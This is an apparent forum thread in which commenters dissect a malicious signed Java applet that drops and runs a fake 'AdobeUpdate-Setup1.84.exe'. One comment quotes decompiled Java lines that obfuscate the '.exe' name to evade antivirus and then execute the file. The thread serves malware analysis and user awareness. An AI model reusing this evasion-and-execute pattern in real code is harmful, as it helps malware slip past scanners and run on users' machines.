[Tomdarkness]

Just appears to be an applet that downloads the actual payload . Although, I'm not a security expert and I can't see where the actual exploit is that would allow the file to be downloaded and executed.

[arethuza]

It's a long time since I went anywhere near Java (let alone an applet) - but these lines don't look very nice:

  String str2 = System.getenv("APPDATA");
  String str5 = str2 + "\\";
  String str6 = "AdobeUpdate-Setup1.84##e";
  String str9 = str5.concat(str6.replace("##", ".ex"));     
  Runtime.getRuntime().exec(str9);

[Tomdarkness]

From a quick glance it would appear it tries to execute:

C:\Users\<username>\AppData\Roaming\AdobeUpdate-Setup1.84.exe

Just appears to be a rudimentary attempt at obfuscating the executable path.

The question is, how come the JVM is allowing Runtime.getRuntime().exec() to be called.

[ewoodrich]

According to an up thread commenter, it's digitally signed which allows a prompt to the user for elevated permissions.

[arethuza]

An evil wee signed applet.

[andy_boot]

I think thats done to fool AV software. - AV software will probably flag up any string which equals "AdobeUpdate-Setup1.exe"

[svachalek]

All AV software is about that dumb as far as I know. Anyone who is depending on AV software to protect things like actual money is in serious trouble.

[andreasvc]

You can't really expect it to do much more in this case, you can make the computation which results in ".exe" arbitrarily complex, and detection needs to be cheap. Ultimately the problem is that AV software is in the business of enumerating badness. You need to do whitelisting, for example of who gets to execute arbitrary code, which is the problem here.

[TazeTSchnitzel]

  Runtime.getRuntime().exec(str9);

Why this works is beyond me, but that looks like the actual call to execute it.

[dolphenstein]

A signed applet can do pretty much anything an executable app can do if the user gives it permission. I built a little zip utility applet years ago that accesses the file system, ezyzip.com. Still works even though the signature is expired.

[Intermernet]

Wow, I hadn't noticed that about Java before, Just checked ezyzip.com. The sig is expired, but it only says that right at the bottom of the dialogue, and it still allows you to run it without a problem. I can imagine many people just clicking through that, as it seems almost identical to the standard Java applet warning.

Oracle really need to change that, there should be flashing red lights (alright, maybe not flashing) on that dialogue, otherwise any previously valid signature on a Java applet will be happily trusted by the majority of the internet.

Also, I noticed that in the comments on the bitcointalk site, that many people are blaming this on windows. I know the payload is an EXE, but has anyone analysed it and checked if this applies to other OS's as well? If this is (as the author claims) a Java 0-day attack it may well work on other operating systems, and for other purposes. I personally suspect this is a matter of the author accidentally granting permissions to an app that he shouldn't have, but it sounds like this "AdobeUpdate-Setup1.84.exe" could do with some analysis.

[pbhjpbhj]

Anyone else thinking dolphenstein is an evil genius cracker who just got a load of HNers to run his exploit?

[pjzedalis]

A valid certificate does not make a bad program good.

[Tomdarkness]

Yeah, I'd of assumed this would of not been allowed by the JVM hence the exploit somewhere.

Edit: Apparently the applet was signed, hence no exploit needed.

[smoyer]

I reached the same conclusion ... the program downloads a file named "AdobeUpdate-Setup1.84.exe" into Java's temporary directory and then runs it with the line "Runtime.getRuntime().exec(str9);".